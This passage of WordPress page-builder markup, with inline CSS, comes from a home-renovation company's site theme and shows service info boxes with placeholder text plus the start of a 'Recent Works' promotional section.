{\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":27,\"title\":\"services-img1\",\"filename\":\"services-img1.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img1/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img1\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:36.000Z\",\"modified\":\"2021-05-25T13:48:36.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"598bfdc22b\",\"delete\":\"5d1b940541\",\"edit\":\"0a4d84ebf2\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=27u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3709,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":65,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\",\"height\":65,\"width\":65,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":65,\"resshowPrefix\":false,\"counterId\":\"6144aa30-a171-49e0-ba02-9fdbf6c0339a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: 65px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-6144aa30-a171-49e0-ba02-9fdbf6c0339a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img1.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\"><strong>Miscellaneous</strong></h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/remodeling/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"blockId\":\"d3c03c5f-5606-4310-98a4-30d73f9945ed\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-d3c03c5f-5606-4310-98a4-30d73f9945ed .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-d3c03c5f-5606-4310-98a4-30d73f9945ed\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":30,\"title\":\"services-img4\",\"filename\":\"services-img4.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img4/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img4\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"632a5a602a\",\"delete\":\"eed2430960\",\"edit\":\"f2d09a400a\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=30u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":2845,\"filesizeHumanReadable\":\"3 KB\",\"context\":\"\",\"height\":66,\"width\":57,\"orientation\":\"portrait\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\",\"height\":66,\"width\":57,\"orientation\":\"portrait\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":57,\"resshowPrefix\":false,\"counterId\":\"bbb98fc7-3a1c-40ca-8905-157ad2df8e24\"} -->\n<style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: 57px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-bbb98fc7-3a1c-40ca-8905-157ad2df8e24 skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/services-img4.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h3 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Insurance</h3></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis. Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/plumbing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#303030;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#303030\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns --></div></section></div>\n<!-- /wp:skt-blocks/section --></div></section></div>\n<!-- /wp:skt-blocks/section -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"6e721bfc-c727-4b32-a621-9a1dcc0e501c\",\"topPadding\":100,\"topPaddingMobile\":40,\"topPaddingTablet\":40,\"bottomPadding\":100,\"bottomPaddingMobile\":40,\"bottomPaddingTablet\":40,\"opacity\":100,\"colorLocation1\":68,\"colorLocation2\":44,\"backgroundColor1\":\"#072d69\",\"backgroundColor2\":\"#012257\",\"backgroundType\":\"gradient\",\"className\":\"gb-renovation-section-3\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-section-3 skt-blocks-block-section-outer-wrap block-6e721bfc-c727-4b32-a621-9a1dcc0e501c background-type-gradient alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 40px; padding-bottom: 40px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 100px; padding-bottom: 100px; padding-left: 10px; padding-right: 10px; }\n}\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 1),rgba(255, 255, 255, 1)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 1); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 1) 0%, rgba(255, 255, 255, 1) 100%); }\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 1); }\n</style><style type=\"text/css\"> .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-6e721bfc-c727-4b32-a621-9a1dcc0e501c.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;background-image:linear-gradient(90deg, rgba(7, 45, 105, 1) 68%,rgba(1, 34, 87, 1) 44%);box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"994f6e51-2a17-435a-8b2f-9235a8bb8702\"} -->\n<style type=\"text/css\"> .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-994f6e51-2a17-435a-8b2f-9235a8bb8702 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-994f6e51-2a17-435a-8b2f-9235a8bb8702 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-2\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":34,\"rightPaddingTablet\":0,\"blockId\":\"2ac6f6b9-bced-48f5-9f60-eae03e300214\"} -->\n<style type=\"text/css\"> .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: 0px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-2ac6f6b9-bced-48f5-9f60-eae03e300214 .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-2ac6f6b9-bced-48f5-9f60-eae03e300214\" style=\"width:34%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\",\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleLetterSpacing\":1,\"headingTitleColor\":\"#ffffff\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#ffffff\",\"headingAlignment\":\"left\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-8bf3bbd9-4480-4f20-b0d2-2f98504f4ec9\"><h2 class=\"responsive-heading-title-text\" style=\"font-family:Poppins;font-weight:600;line-height:1;letter-spacing:1px;color:#ffffff\">Recent Works</h2><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#ffffff\"><strong>We take pride in our work</strong></p></div>\n<!-- /wp:skt-blocks/advanced-heading -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\">100% customer satisfaction. Locally owned and operated for 25+ years</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:paragraph {\"textColor\":\"white\"} -->\n<p class=\"has-white-color has-text-color\"> Contact us today for a free estimate and see why so many of your neighbors and friends refer Dunrite.</p>\n<!-- /wp:paragraph -->\n\n<!-- wp:spacer {\"height\":\"50px\"} -->\n<div style=\"height:50px\" aria-hidden=\"true\" class=\"wp-block-spacer\"></div>\n<!-- /wp:spacer -->\n\n<!-- wp:skt-blocks/buttons {\"buttonAlignment\":\"left\"} -->\n<div class=\"left tabletAligncenter mobileAligncenter skt-blocks-block-button skt-blocks-buttons__outer-wrap 